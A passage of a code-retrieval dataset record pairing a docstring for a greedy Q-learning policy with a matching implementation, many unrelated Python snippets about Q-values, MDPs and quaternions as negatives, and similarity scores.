(iteration ** self.state_space_parameters.learning_rate_omega)\n\n # Q_Learning update rule\n values[action_index] = ( # Q_t+1(s_i,𝑢) =\n values[action_index] + # Q_t(s_i,𝑢)\n learning_rate_alpha * ( # α\n reward # r_t\n + self.state_space_parameters.discount_factor # γ\n * max_over_next_states # max_{𝑢'∈ 𝒰(s_j)} Q_t(s_j,𝑢')\n - values[action_index] # -Q_t(s_i,𝑢)\n )\n )\n\n self.qstore.q[start_state.as_tuple()] = {'actions': actions, 'utilities': values}", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n\n position = state.getPacmanPosition()\n\n return self.values[(str(position), action)]", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n\n position = state.getPacmanPosition()\n\n return self.values[(str(position), action)]", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n\n position = state.getPacmanPosition()\n\n return self.values[(str(position), action)]", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n\n position = state.getPacmanPosition()\n\n return self.values[(str(position), action)]", "def set_qs_type(self: Qs, qs_type: str = \"\", rows: int = 0, columns: int = 0, copy: bool = True) -> Qs:\n\n # Checks.\n if rows and columns and rows * columns != self.dim:\n raise ValueError(\n f\"Oops, check those values again for rows:{rows} columns:{columns} dim:{self.dim}\"\n )\n\n new_q = self\n\n if copy:\n new_q = deepcopy(self)\n\n # Assign values if need be.\n if new_q.qs_type != qs_type:\n new_q.rows = 0\n\n if qs_type == \"ket\" and not new_q.rows:\n new_q.rows = new_q.dim\n new_q.columns = 1\n\n elif qs_type == \"bra\" and not new_q.rows:\n new_q.rows = 1\n new_q.columns = new_q.dim\n\n elif qs_type in [\"op\", \"operator\"] and not new_q.rows:\n # Square series\n root_dim = math.sqrt(new_q.dim)\n\n if root_dim.is_integer():\n new_q.rows = int(root_dim)\n new_q.columns = int(root_dim)\n qs_type = \"op\"\n\n elif rows * columns == new_q.dim and not new_q.qs_type:\n if new_q.dim == 1:\n qs_type = \"scalar_q\"\n elif new_q.rows == 1:\n qs_type = \"bra\"\n elif new_q.columns == 1:\n qs_type = \"ket\"\n else:\n qs_type = \"op\"\n\n if not qs_type:\n raise Exception(\n \"Oops, please set rows and columns for this quaternion series operator. Thanks.\"\n )\n\n if new_q.dim == 1:\n qs_type = \"scalar_q\"\n\n new_q.qs_type = qs_type\n\n return new_q", "def __int__(self):\n return int(self.q[0])", "def update_Q(self):", "def qUpdate(self,s,a,r,sPrime):\r\n #get max_a' Q(s',a')\r\n \"\"\"\r\n maxA = 0\r\n maxQ = float(\"-inf\")\r\n for aCurr in actions:\r\n qCurr = Q[(sPrime,aCurr)]\r\n if qCurr > maxQ:\r\n maxA = aCurr\r\n maxQ = qCurr\r\n \"\"\"\r\n maxQ = self.maxQ(sPrime)[0]\r\n #update Q and return it\r\n self.Q[(s,a)] = (1 - self.alpha) * self.Q[(s,a)] + self.alpha * (r + self.gamma * maxQ)", "def _get_qvalues(self, state_t):\n qvalues = self.network(state_t)\n return qvalues", "def parse_qpf(q):\n if q == \"M\":\n value = \"NULL\"\n trace = \"0\"\n elif q == \"T\":\n value = \"0.00\"\n trace = \"1\"\n else:\n value = q\n trace = \"0\"\n\n return quote(value), quote(trace)", "def q1(self):\n import numpy as np\n dipole = self.get('q1') # they are (so far) always given in AU\n if dipole is not None:\n dipole = np.array([dipole[2], dipole[0], dipole[1]])\n return dipole", "def get_q_values(self, state, network):\n out = None\n state = state.permute(0, 3, 1, 2)\n #pdb.set_trace()\n ##############################################################\n ################ YOUR CODE HERE - 4-5 lines lines ################\n if network == 'q_network':\n out = self.q_network(state)\n else:\n out = self.target_network(state)\n ##############################################################\n ######################## END YOUR CODE #######################\n return out", "def new_q_value(q_table: np.ndarray, old_state: int, action: int,\n learning_rate: float, current_reward: float,\n new_state: int, discount_rate :float) -> float:\n result = q_table[old_state, action]\n result += learning_rate * delta_q_value(q_table, action, current_reward,\n old_state, new_state,\n discount_rate)\n return result", "def Q(self, value):\n assert value > 0, \"Q needs to be positive and above zero (we divide by Q)\"\n self._Q = value\n self._update()", "def q(self):\n self.qTable()", "def xut2q( self, x , u , t ):\n \n # default is q = x\n \n return x", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n qvalue = 0\n features = self.featExtractor.getFeatures(state, action)\n #Each feature is in the form of dictionary {((3, 3), 'east'): 1.0}. Each key is a combination of coordinate and direction. Each value represents the old qvalue.\n for feature in features.keys():\n qvalue += features[feature] * self.weights[feature]\n return qvalue", "def update_Q(self, state, action, reward, new_state = None):\n Q_val = self.Q[state][action]\n \n # Look at the best action from the next state.\n Qp_val = 0\n if new_state is not None:\n Qp_val = max(self.Q[new_state].values())\n \n # The famous formula:\n Q_val = Q_val + self.alpha * (reward + self.gamma * Qp_val - Q_val)\n #print self.alpha\n #print state, 'action: ', action\n #print 'Q[%s]: %s' % (state, self.Q[state])\n #print 'Q val: ', Q_val\n \n self.Q[state][action] = Q_val\n \n return None", "def getQValue(self, state, action):\n return self.q.get((tuple(state), action), 0)", "def update_Q(self, state, action, reward, state_prime):\n # print \"Updating Q MATRIX\"\n\n # Q(s,a) = (1- alpha)*Q(s,a) + alpha*(reward + gamma * max_Q(s', a'))\n\n # Init value if it doesn't exist: Q(self.state, self.action) = 0\n if (state, action) not in self.Q:\n self.Q[(state, action)] = self.Q_default_value\n\n self.Q[(state, action)] = (1 - self.alpha) * self.Q[(state, action)] + \\\n self.alpha * (reward + self.gamma * self.max_Q_by_state(state_prime))", "def ea_from_q(p, q):\n return p * q / (0.622 + 0.378 * q)", "def f(self, (k,t), (J,q,dq), **params):\n f = 0.*q\n return f", "def enumerate_test_metric(\n self, qset: Iterator[Tuple[str, float]]\n ) -> Iterator[Tuple[CompletionElement, CompletionElement]]:\n qset = sorted(qset)\n current = 0\n for query, weight in qset:\n while current < len(self) and self[current].value <= query:\n current += 1\n ind = current - 1\n el = CompletionElement(query, weight)\n if ind >= 0:\n inset = self[ind]\n le = len(inset.value)\n if le <= len(query) and inset.value == query[:le]:\n if le == len(query):\n found = inset\n el.mks0 = inset.mks0\n el.mks1 = inset.mks1\n el.mks2 = inset.mks2\n el.mks0_ = len(query)\n el.mks1_ = len(query)\n el.mks2_ = len(query)\n else:\n found = None\n el.mks0 = 0\n el.mks0_ = 0\n el.mks1 = inset.mks1 + len(query) - le\n el.mks1_ = le\n el.mks2 = inset.mks2 + len(query) - le\n el.mks2_ = le\n else:\n found = None\n el.mks0 = len(query)\n el.mks1 = len(query)\n el.mks2 = len(query)\n el.mks0_ = len(query)\n el.mks1_ = len(query)\n el.mks2_ = len(query)\n else:\n found = None\n el.mks0 = len(query)\n el.mks1 = len(query)\n el.mks2 = len(query)\n el.mks0_ = len(query)\n el.mks1_ = len(query)\n el.mks2_ = len(query)\n\n yield el, found", "def computeQValueFromValues(self, state, action):\n #get the Transition function and nextStates\n state_prob_pair=self.mdp.getTransitionStatesAndProbs(state,action)\n #initialize the value to zero\n actual_value=0\n #iterate over probabilities (transition functions) and next states\n for pair in state_prob_pair:\n #compute qvalue\n actual_value+=pair[1]*(self.mdp.getReward(state,action,pair[0])+self.discount*self.values[pair[0]])\n #print \"The Q value is \",actual_value\n return actual_value", "def get(self, action: Action) -> Qval:\n b_q_values = self.with_batch_dim(self.q_values)\n return b_q_values.gather(1, action.long().view(-1, 1)).squeeze(1)", "def computeValueFromQValues(self, state):\n \"*** YOUR CODE HERE ***\"\n valueList = []\n ############################################################################################################ Eric Changed state to self.index\n for a in state.getLegalActions(self.index):\n valueList.append(self.getQValue(state, a))\n if len(valueList) == 0:\n return 0.0\n return max(valueList)\n\n\n util.raiseNotDefined()", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n\n return self.values[(str(state), action)]", "def setQ(self,Q):\n self.Q = Q", "def expand_q(self) -> Q:\n \"\"\"Expand each term.\"\"\"\n\n self.t = sp.expand(self.t)\n self.x = sp.expand(self.x)\n self.y = sp.expand(self.y)\n self.z = sp.expand(self.z)\n return self", "def calc_q_values_1(self, state):\n return self._sess.run(self._q_pred_1,\n feed_dict={self._state_placeholder:state});", "def q_value(self, state_action):\n state, action = state_action\n hashable_state = self.represent_state(state)\n if not (hashable_state, action) in self.q_values:\n self.q_values[hashable_state, action] = self.reward(Game.game_state(state))\n return self.q_values[hashable_state, action]", "def get_qs(self, state):\n state = state.astype(np.float32)\n if len(state.shape) == 3:\n state = state.reshape([1] + list(self.input_shape))\n return self.session.run(self.q_policy,\n feed_dict={self.s_placeholder: state})", "def q_values(self, state):\n return self.sess.run(self.graph.target_q_values,\n feed_dict={self.graph.states: [state]}).reshape(-1)", "def update_q_value(q_table: np.ndarray, state: int, action: int,\n learning_rate: float, current_reward: float,\n new_state: int, discount_rate: float) -> None:\n q_table[state, action] = new_q_value(q_table, state, action, learning_rate,\n current_reward, new_state,\n discount_rate)", "def get_qvalues(self, prev_state, obs_t):\r\n obs_t = torch.tensor(obs_t, device=self.device, dtype=torch.float)\r\n (h, c), qvalues = self.forward(prev_state, obs_t)\r\n return (h.detach(), c.detach()), qvalues.data.cpu().numpy()", "def get_exact(self):\n from sympy.polys.domains import QQ\n return QQ", "def computevaluefromqvalues(self, state):\n legalactions = env.getlegalactions(deepcopy(env.state_to_array(state)))\n if len(legalactions) == 0:\n return 0.0\n tmp = Counter()\n for action in legalactions:\n tmp[action] = self.getqvalue(state, action)\n return tmp[tmp.argMax()]", "def computeValueFromQValues(self, state):\n \"*** YOUR CODE HERE ***\"\n self.Temporary_QValue = util.Counter() #initializing a temporary QValue counter\n\n temporary_QValue = self.Temporary_QValue\n\n maxAction_OverLegalAction = self.getPolicy(state) #Calls get poilcy which in turn calls the computeActionFromQValues function to get the action we need to take\n\n if maxAction_OverLegalAction == 0: #checks if returned state is terminal state\n return 0.0\n\n temporary_QValue[maxAction_OverLegalAction] = self.getQValue(state,maxAction_OverLegalAction) #to get the Qvalue of the action returned from computeActionFromQValues function\n\n\n return temporary_QValue[maxAction_OverLegalAction] #Returns the max_action Q(state,action)\n #util.raiseNotDefined()", "def simple_q(self: Qs) -> Qs:\n\n new_states = []\n\n for ket in self.qs:\n new_states.append(ket.simple_q())\n\n return Qs(\n new_states, qs_type=self.qs_type, rows=self.rows, columns=self.columns\n )", "def apriori(q, q_pvalue, insig, sig):\r\n\r\n insignificant = [] + insig\r\n significant = [] + sig\r\n\r\n while len(q) > 0:\r\n element = q[0]\r\n if isinstance(element, int):\r\n element = tuple([element]) # it easier to just convert this to a tuple (so everything is the same data type)\r\n\r\n pvalue = q_pvalue[element] # chi-squared test, verify if the given element satisfies the support criterion\r\n\r\n if pvalue == 1:\r\n significant.append(element)\r\n #print significant\r\n for i in range(element[-1]+1,4):\r\n if i not in insignificant:\r\n #print i, \"#####\", element\r\n tentativeCandidate = tuple(sorted(list(element)+[i])) # add the two lists together (element is a list)\r\n if tentativeCandidate not in q and tentativeCandidate not in significant: # then add it to the queue\r\n #print \"Queue {}\\nTentative Candidate{}\\nSignificant {}\\nInsignicant {}\\n\" \\\r\n # \"##################################\".format(q,tentativeCandidate,significant,insignificant)\r\n q.append(tentativeCandidate)\r\n yield q,tentativeCandidate,significant,insignificant\r\n q.pop(0) #remove it from the queue after we have created/tried all the tentativeCandidates\r\n\r\n else: # when the p-value not significant\r\n q.pop(0)\r\n insignificant.append(element)\r\n yield q,tentativeCandidate,significant,insignificant\r\n else:\r\n yield q,tentativeCandidate,significant,insignificant # grab the last values before breaking out of the while loop\r", "def update_q_values(self, state, value):\n if self.prev_state is not None and self.learning:\n reward = self.reward(Game.game_state(state))\n self.q_values[self.represent_state(self.prev_state), self.prev_action] += self.alpha * (\n reward + self.gamma * value - self.prev_q_val)", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n # OUR CODE HERE\n #get the value of the state\n qVal = self.values[state]\n #iterate through the MDP transition states from the current state\n for transitionState, probability in self.mdp.getTransitionStatesAndProbs(state, action):\n #q value = discount * expected value of reward of state\n qVal += self.discount * probability * self.values[transitionState]\n return qVal\n # END OUR CODE", "def Q(self):\n return self._Q", "def computeQValueFromValues(self, state, action):\n # assign q value to 0\n qvalue = 0\n\n # get the possible transition states and actions\n possible_tansition = self.mdp.getTransitionStatesAndProbs(state, action)\n\n # for each transition in list of possible transitions\n # transition[0] has the successor state (s-prime) represented in co-ordinates\n for transition in possible_tansition:\n\n # calculate reward transition\n reward = self.mdp.getReward(state, action, transition[0])\n\n # transition[1] has the probablity of reaching a particular successor state (s-prime) from state, action pair\n probability = transition[1]\n\n # get the utility value from tansition[0] which has successor state represented in coordinates\n utility_value = self.getValue(transition[0])\n\n # compute q value collectively using reward and probability transition\n qvalue = qvalue + (probability * (reward + (self.discount * utility_value)))\n\n # return q value\n return qvalue", "def value(self) -> global___Expression:", "def value(self) -> global___Expression:", "def __init__(self):\n self.q1 = []\n self.q2 = []", "def __init__(self):\n self.q1 = []\n self.q2 = []", "def calc_q_values(self, state):\n state = state[None, :, :, :]\n return self.q_network.predict_on_batch(state)", "def __init__(self):\n self.q1 = []", "def q(self):\n return self._q", "def Q(self, state, action):\n return self[state, action]", "def __init__(self):\n {}\n #generate a monoid Q\n self.monoid_Q = self.generateQ()[0]\n self.relationOfElements_Q = self.generateQ()[1]\n self.p_Position = self.generateQ()[2]\n self.qOfPosition = self.generateQ()[3]\n #print(self.qOfPosition)", "def test_set_1(self):\n\n qubit.set(1, 0)\n\n result = qubit.measure(polarization)\n self.assertEqual(1, result)", "def Q(self, observation, action):\n return self[observation, action]", "def computeValueFromQValues(self, state):\n \"*** YOUR CODE HERE ***\"\n if not self.getLegalActions(state): return 0\n\n best_action = self.computeActionFromQValues(state)\n return self.getQValue(state, best_action)", "def _prepare(self, q):\n # store it in _lastr which is consulted in BasePDFGenerator.__call__\n self._lastr = q\n self._calc.qstep = q[1] - q[0]\n self._calc.qmin = q[0]\n self._calc.qmax = q[-1] + 0.5*self._calc.qstep\n return", "def computeQValueFromValues(self, state, action):\n \n \n next_states_probs = self.mdp.getTransitionStatesAndProbs(state, action)\n # liste des recompenses R(s,a,s')\n rewards = []\n # liste des probas de transitions P(s'|a,s)\n probs = []\n # liste des Vk(s')\n previous_values = []\n # occurence[0] = les next_state\n # occurence[1] = les proba de transi\n for occurence in next_states_probs:\n rewards.append(self.mdp.getReward(state, action, occurence[0]))\n probs.append(occurence[1])\n previous_values.append(self.getValue(occurence[0]))\n Q_value = 0\n # boucle qui calcule somme des ( P(s'|a,s) * [R(s,a,s') + gamma * Vk(s')] ) sur les s'\n for i in range(len(probs)):\n Q_value += probs[i] * (rewards[i] + self.discount * previous_values[i])\n \n return Q_value\n util.raiseNotDefined()", "def q(self) -> List[Qubit]:\n return self._qubits", "def getQValue(self, state, action):\n \"\"\"Description:\n [Enter a description of what you did here.]\n Use first equation in slide 71 of MDP to compute q-value depond on weights and current features.\n \n !! But I think what I did is not work for IdentityExtractor. Because feature of IdentityExtrator always return 1,\n it did not change even a ghost is closing.\n \"\"\"\n \"\"\" YOUR CODE HERE \"\"\"\n # if weight is empty, then weight will need to initial to 1 for all features\n # According to which Extractor user choose, weight counter will have equal number of keys.\n if len(self.weight) == 0:\n feat = self.featExtractor.getFeatures(state, action)\n self.weight.incrementAll(feat.keys(), 1)\n \n qValue = self.weight * self.featExtractor.getFeatures(state,action)\n return qValue\n \"\"\" END CODE \"\"\"", "def computeQValueFromValues(self, state, action):\n \"*** YOUR CODE HERE ***\"\n qValue = 0\n transitions = self.mdp.getTransitionStatesAndProbs(state, action)\n #print('Transitions: ' + str(transitions))\n for t in transitions:\n nextState, prob = t\n reward = self.mdp.getReward(state, action, nextState)\n #print('Reward: ' + str(reward))\n oneTransition = prob * (reward + self.discount * self.values[nextState])\n qValue = qValue + oneTransition\n return qValue", "def M(self, q):\n\n # check for function in dictionary\n if self._M is None:\n self._M = self._calc_M()\n parameters = tuple(q)\n return np.array(self._M(*parameters), dtype='float32')", "def qval(self, **kwargs):\n raise ValueError(\"This function is not available in lazy results evaluation as it would \"\n \"require all pairwise tests to be performed.\")", "def vector_q(q_1: Q) -> Q:\n\n end_q_type = f\"vector_q({q_1.q_type})\"\n\n v = Q(\n [0, q_1.x, q_1.y, q_1.z],\n q_type=end_q_type,\n representation=q_1.representation,\n )\n return v" ]
[ "0.62951297", "0.6088538", "0.6056516", "0.5923299", "0.5866351", "0.5854476", "0.57913595", "0.57575697", "0.57466906", "0.5684224", "0.5621595", "0.55795395", "0.55610085", "0.55451214", "0.54641014", "0.5457697", "0.544126", "0.5425461", "0.5354141", "0.53406006", "0.53403276", "0.53275746", "0.5326045", "0.53053916", "0.52839494", "0.5270501", "0.5261488", "0.52555704", "0.5245386", "0.5235252", "0.5234572", "0.5226508", "0.5223305", "0.52159226", "0.5213902", "0.52102065", "0.5197988", "0.5197988", "0.5197988", "0.5197988", "0.51908207", "0.5185477", "0.5165913", "0.51631665", "0.5161437", "0.5153007", "0.515272", "0.5152139", "0.51487327", "0.514783", "0.51470786", "0.5142468", "0.513121", "0.5127432", "0.51203924", "0.51046926", "0.5091653", "0.50809485", "0.50797963", "0.5066822", "0.506662", "0.5066027", "0.50617987", "0.50606763", "0.504766", "0.5046093", "0.5041201", "0.5039997", "0.50379664", "0.5030351", "0.50280774", "0.50266814", "0.50257695", "0.5025432", "0.5025309", "0.5021881", "0.50171", "0.50094575", "0.5009225", "0.49981734", "0.49969003", "0.49969003", "0.49912062", "0.49912062", "0.49911994", "0.49765843", "0.4970707", "0.49682525", "0.4952539", "0.49486855", "0.49448", "0.49342364", "0.49337745", "0.49218845", "0.49213693", "0.49209076", "0.49191865", "0.49126405", "0.4912528", "0.48883286" ]
0.53853166
18
Return pi(s) based on a greedy strategy. >>> q = TabularQ([0,1,2,3],['b','c']) >>> q.set(0, 'b', 5) >>> q.set(0, 'c', 10) >>> q.set(1, 'b', 2) >>> greedy(q, 0) 'c' >>> greedy(q, 1) 'b'
def greedy(q, s): # Your code here return argmax(q.actions,lambda a:q.get(s,a))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def epsilon_greedy(q, s, eps = 0.5):\n if random.random()<eps:\n return uniform_dist(q.actions).draw()\n else:\n return greedy(q,s)", "def greedy():\n return constant(0)", "def greedy_policy(self):\n return defaultdict(lambda: 0)", "def greedy(initial_state, heuristic, dimension=3):\n\n\tdef add_cost(node):\n\t\tnode.cost = heuristic(node.state)\n\n\treturn search(initial_state, Frontier(PriorityQueue), dimension, cost_fn=add_cost)", "def q_greedify_policy(env, V, pi, s, gamma):\n ### START CODE HERE ###\n ##q(s,a)=sigma(P(ss')*(gamma*V(s')+R(s,a,s'))\n q = np.zeros((env.action_space.n))\n for idx, action in enumerate(range(env.action_space.n)):\n for prob_next_state, next_state, reward_next_state, done in env.P[s][action]:\n q[idx] += prob_next_state * ((gamma * V[next_state]) + reward_next_state)\n\n greedy_action = np.argmax(q)\n # print(greedy_action)\n for action, action_prob in enumerate(pi[s]):\n if action == greedy_action:\n print(action, greedy_action)\n pi[s][action] = 1\n else:\n pi[s][action] = 0", "def eps_greedy(Q, epsilon, num_actions):\n if np.random.uniform(0,1,1) > epsilon:\n action = np.argmax(Q)\n else:\n action = np.random.randint(low=0, high=num_actions)\n \n Q_value = Q[action]\n return action, Q_value", "def greedy_proportional_strategy(our_hist, their_hist):\n if len(our_hist) == 0 or len(their_hist) == 0:\n return choice(CHOICES)\n freqs = count(their_hist)\n prediction_for_them = np.argmax(freqs)\n return CHOICES[(prediction_for_them + 1) % 3]", "def greedy(self):\n n_step_t = self.filter['n_step_t']\n n_traj = self.filter['n_traj']\n traj = self.filter['traj']\n steps = [0 for i in xrange(n_step_t)]\n for i in xrange(n_traj):\n n_step = traj[i]['n_step']\n for j in xrange(n_step):\n steps[j] += 1\n self.filter['steps'] = steps\n \n return", "def epsilon_greedy(Q, epsilon, state):\n random_number = random.random()\n if (random_number < epsilon) and (state not in critical_states):\n return env.action_space.sample()\n\n else:\n return np.argmax(Q[state])", "def greedy_eps(self, Q):\r\n s = self.get_state()\r\n s_x, s_y = s[0][0], s[0][1]\r\n s_vx, s_vy = s[1][0], s[1][1]\r\n if np.random.rand() > self.EPS:\r\n print(Q[s_x, s_y, s_vx, s_vy, :, :])\r\n if (np.max(Q[s_x, s_y, s_vx, s_vy, :, :]) ==\r\n np.min(Q[s_x, s_y, s_vx, s_vy, :, :])):\r\n a = (0, 0)\r\n else:\r\n a = np.argmax(Q[s_x, s_y, s_vx, s_vy, :, :])\r\n a = np.unravel_index(a, (3, 3)) - np.array([1, 1])\r\n a = (a[0], a[1])\r\n else:\r\n a = self.action_to_tuple(random.randrange(9))\r\n\r\n return a", "def test_greedy_strategy():\n tiles = Tiles(800, 100)\n board = Board(800, 100, tiles)\n player = Player('Alfred', board, 'black')\n ai = AI(board, player)\n for i in range(board.count//2 + 1, board.count - 1):\n board.add_tile(i, board.count//2 - 1, 'black')\n assert ai.greedy_strategy()[0] == (board.count - 1, board.count//2 - 1)\n assert len(ai.greedy_strategy()[1]) == board.count//2 - 1\n board.add_tile(board.count//2 - 1, 0, 'white')\n for i in range(1, board.count - 1):\n if board.tiles_list[board.count//2 - 1][i] is None:\n board.add_tile(board.count//2 - 1, i, 'black')\n else:\n board.tiles_list[board.count//2 - 1][i].color = 'black'\n assert ai.greedy_strategy()[0] == (board.count//2 - 1, board.count - 1)\n assert len(ai.greedy_strategy()[1]) == board.count - 2", "def epsilon_greedily_update_policy(self, current_Q, iterations_completed):\n iteration = iterations_completed+1\n # epsilon = min(1/np.log(iterations_completed+.0001),1)\n # epsilon = 1/iteration\n epsilon = 0.1\n def new_policy(state):\n heads = True if random.random() < epsilon else False # Flip our epsilon greedy coin\n if heads: # If heads comes up, choose random action\n return random.randint(0, self.nA-1)\n else: # If tails comes up, choose greedy option\n return np.argmax(current_Q[state]['Q(s,a)'])\n return new_policy", "def heart(q):\n l = []\n j = 1\n bound = 4 * arith1.floorsqrt(q)\n for p in prime.generator():\n if p != q:\n l.append(p)\n j *= p\n if j > bound:\n break\n return l", "def make_epsilon_greedy_policy(Q, epsilon, nA):\n def policy_fn(observation):\n if random.random() < (1 - epsilon):\n return np.argmax(Q[observation])\n else:\n return random.choice(np.arange(nA))\n\n return policy_fn", "def PaleyGraph(q):\n from sage.rings.finite_rings.integer_mod import mod\n from sage.rings.finite_rings.finite_field_constructor import FiniteField\n from sage.arith.all import is_prime_power\n assert is_prime_power(q), \"Parameter q must be a prime power\"\n assert mod(q,4)==1, \"Parameter q must be congruent to 1 mod 4\"\n g = Graph([FiniteField(q,'a'), lambda i,j: (i-j).is_square()],\n loops=False, name = \"Paley graph with parameter %d\"%q)\n return g", "def _greedy(self, state):\n\n node = self.mcts_head\n if self.verbose > 1:\n logger.debug(f\"Starting greedy algorithm.\")\n\n while not node.terminal:\n # Parse current state\n this_state, total_reward, terminal = self._parse_path(state, node.path)\n node.set_terminal(terminal)\n if self.verbose > 1:\n logger.debug(f\" Analyzing node {node.path}\")\n\n # Expand\n if not node.terminal and not node.children:\n actions = self._find_legal_actions(this_state)\n step_rewards = [self._parse_action(action, from_which_env=\"sim\") for action in actions]\n if self.verbose > 1:\n logger.debug(f\" Expanding: {len(actions)} legal actions\")\n node.expand(actions, step_rewards=step_rewards)\n\n # If terminal, backup reward\n if node.terminal:\n if self.verbose > 1:\n logger.debug(f\" Node is terminal\")\n if self.verbose > 1:\n logger.debug(f\" Backing up total reward {total_reward}\")\n node.give_reward(self.episode_reward + total_reward, backup=True)\n\n # Debugging -- this should not happen\n if not node.terminal and not node.children:\n logger.warning(\n f\"Unexpected lack of children! Path: {node.path}, children: {node.children.keys()}, legal actions: {self._find_legal_actions(this_state)}, terminal: {node.terminal}\"\n )\n node.set_terminal(True)\n\n # Greedily select next action\n if not node.terminal:\n action = node.select_greedy()\n node = node.children[action]\n\n if self.verbose > 0:\n choice = self.mcts_head.select_best(mode=\"max\")\n self._report_decision(choice, state, \"Greedy\")", "def greedy_policy(self, q, s):\n\t\tresult = []\n\t\tif q is None:\n\t\t\treturn result\n\t\tmax_val = q[0]\n\t\tfor action in self.feasible_actions_in_state(s):\n\t\t\tq_value = q[action]\n\t\t\tif q_value == max_val:\n\t\t\t\tresult.append(action)\n\t\t\telif q_value > max_val:\n\t\t\t\tresult = [action]\n\t\t\t\tmax_val = q_value\n\t\treturn result", "def eps_greedy_policy(q_values, eps, forbidden_actions):\r\n\r\n q_values[forbidden_actions] = np.NINF\r\n indices = torch.nonzero(q_values == q_values.max())\r\n random_index = random.randint(0, indices.shape[1]-1)\r\n best_action_index = indices[random_index]\r\n l = len(q_values)\r\n n_forbidden_actions = np.count_nonzero(forbidden_actions)\r\n p = eps / (l-n_forbidden_actions)\r\n\r\n policy = np.full([l], p)\r\n policy[forbidden_actions] = 0\r\n policy[best_action_index] += 1 - eps\r\n\r\n return policy", "def query_recursive(self, p, q):\n if q <= p:\n return self.e()\n return self._query_recursive(p, q, 0, 0, self.n)", "def lotteryPendingQueue(ipSet):\n\t# make list of possible predicates and remove duplicates\n\tpredicates = [ip.predicate for ip in ipSet]\n\tseen = set()\n\tseen_add = seen.add\n\tpredicates = [pred for pred in predicates if not (pred in seen or seen_add(pred))]\n\n\t#choose the predicate\n\tweightList = np.array([pred.num_tickets for pred in predicates])\n\ttotalTickets = np.sum(weightList)\n\tprobList = np.true_divide(weightList, totalTickets)\n\tchosenPred = np.random.choice(predicates, p=probList)\n\n\t#choose the item and then ip\n\tchosenPredSet = ipSet.filter(predicate=chosenPred)\n\titem = chooseItem(chosenPredSet)\n\tchosenIP = ipSet.get(predicate=chosenPred, item=item)\n\n\t# if this ip is not in the queue\n\tif not chosenIP.is_in_queue:\n\t\tchosenIP.add_to_queue()\n\n\tchosenIP.refresh_from_db()\n\t# if the queue is full, update the predicate\n\treturn chosenIP", "def get_greedy_action(Q, obs):\n obs = Q.xp.asarray(obs[None], dtype=np.float32)\n with chainer.no_backprop_mode():\n q = Q(obs).data[0]\n return int(q.argmax())", "def greedy(self) -> torch.Tensor:\n return self.with_batch_dim(self.q_values).argmax(1).squeeze()", "def enumerate_test_metric(\n self, qset: Iterator[Tuple[str, float]]\n ) -> Iterator[Tuple[CompletionElement, CompletionElement]]:\n qset = sorted(qset)\n current = 0\n for query, weight in qset:\n while current < len(self) and self[current].value <= query:\n current += 1\n ind = current - 1\n el = CompletionElement(query, weight)\n if ind >= 0:\n inset = self[ind]\n le = len(inset.value)\n if le <= len(query) and inset.value == query[:le]:\n if le == len(query):\n found = inset\n el.mks0 = inset.mks0\n el.mks1 = inset.mks1\n el.mks2 = inset.mks2\n el.mks0_ = len(query)\n el.mks1_ = len(query)\n el.mks2_ = len(query)\n else:\n found = None\n el.mks0 = 0\n el.mks0_ = 0\n el.mks1 = inset.mks1 + len(query) - le\n el.mks1_ = le\n el.mks2 = inset.mks2 + len(query) - le\n el.mks2_ = le\n else:\n found = None\n el.mks0 = len(query)\n el.mks1 = len(query)\n el.mks2 = len(query)\n el.mks0_ = len(query)\n el.mks1_ = len(query)\n el.mks2_ = len(query)\n else:\n found = None\n el.mks0 = len(query)\n el.mks1 = len(query)\n el.mks2 = len(query)\n el.mks0_ = len(query)\n el.mks1_ = len(query)\n el.mks2_ = len(query)\n\n yield el, found", "def greedy_search(self,\r\n inputs,\r\n closed,\r\n **kwargs):\r\n\r\n return self.call(inputs, **kwargs), closed", "def epsilon_greedy_probs(self, nA, Q_s, i_count, eps=None):\r\n epsilon = 1.0 / i_count\r\n if eps is not None:\r\n epsilon = eps\r\n \r\n policy_s = np.ones(nA) * epsilon / nA\r\n policy_s[np.argmax(Q_s)] = 1 - epsilon + (epsilon / nA)\r\n return policy_s", "def eps_greedy_action(self, phi, tabu):\n\n # increase counter of actions taken\n self.a_count += 1\n\n # if within the initial buffer before learning starts, random action\n aval_actions = None\n if self.a_count < self.warmup:\n\n if len(tabu) > 0:\n # Remove tabu actions from list of available actions\n aval_actions = [a for a in self.actions if a not in tabu]\n\n action = self.random_action(aval_actions)\n return action, None\n\n elif (self.a_count == self.warmup) and self.verbose:\n print('learning starts')\n\n # evaluate Q(phi, a) for each action\n qvalues = self.Qmodel.predict(phi, batch_size=1)[0]\n\n # generate random value\n randn = np.random.uniform()\n\n # eliminate tabu values from possible actions to pick\n aval_actions = None\n if len(tabu) > 0:\n if randn < self.epsilon:\n aval_actions = [a for a in self.actions if a not in tabu]\n else:\n # Update Qs to low values to ensure they are not picked\n tabu_idx = [i for i in range(self.num_actions) if self.actions[i] in tabu]\n qvalues[tabu_idx] = -9999\n\n # eps-greedy, select random action\n if randn < self.epsilon:\n action = self.random_action(aval_actions)\n a_i = self.action_str2idx(action)\n else:\n # select best action\n a_i = np.argmax(qvalues)\n action = self.actions[a_i]\n\n # update greedy parameter and action count\n self.epsilon *= self.discount_epsilon\n self.a_count += 1\n\n return action, qvalues[a_i]", "def make_epsilon_greedy_policy(Q, epsilon, nA):\n\n def policy_fn(observation):\n\n # get random number\n random_number = random.uniform(0, 1)\n\n # get actions with maximum value\n greedy_actions = np.argwhere(Q[observation] == np.amax(Q[observation])).squeeze()\n if not len(greedy_actions.shape):\n greedy_actions = [greedy_actions]\n action = random.choice(greedy_actions)\n\n # if number less than epsilon, get random other actions\n if random_number <= epsilon:\n all_actions = list(range(0, nA))\n if not len(greedy_actions) == nA:\n action = random.choice(all_actions)\n\n return int(action)\n\n return policy_fn", "def genKeys(p, q):\r\n n = p * q\r\n phi = (p-1)*(q-1)\r\n #e = findE(phi, p, q)\r\n e = findE(phi)\r\n \r\n d = ext_Euclid(phi, e) #Using the extended Euclidean algorithm to compute d\r\n if (d < 0):\r\n d += phi\r\n print (\"n = \"+ 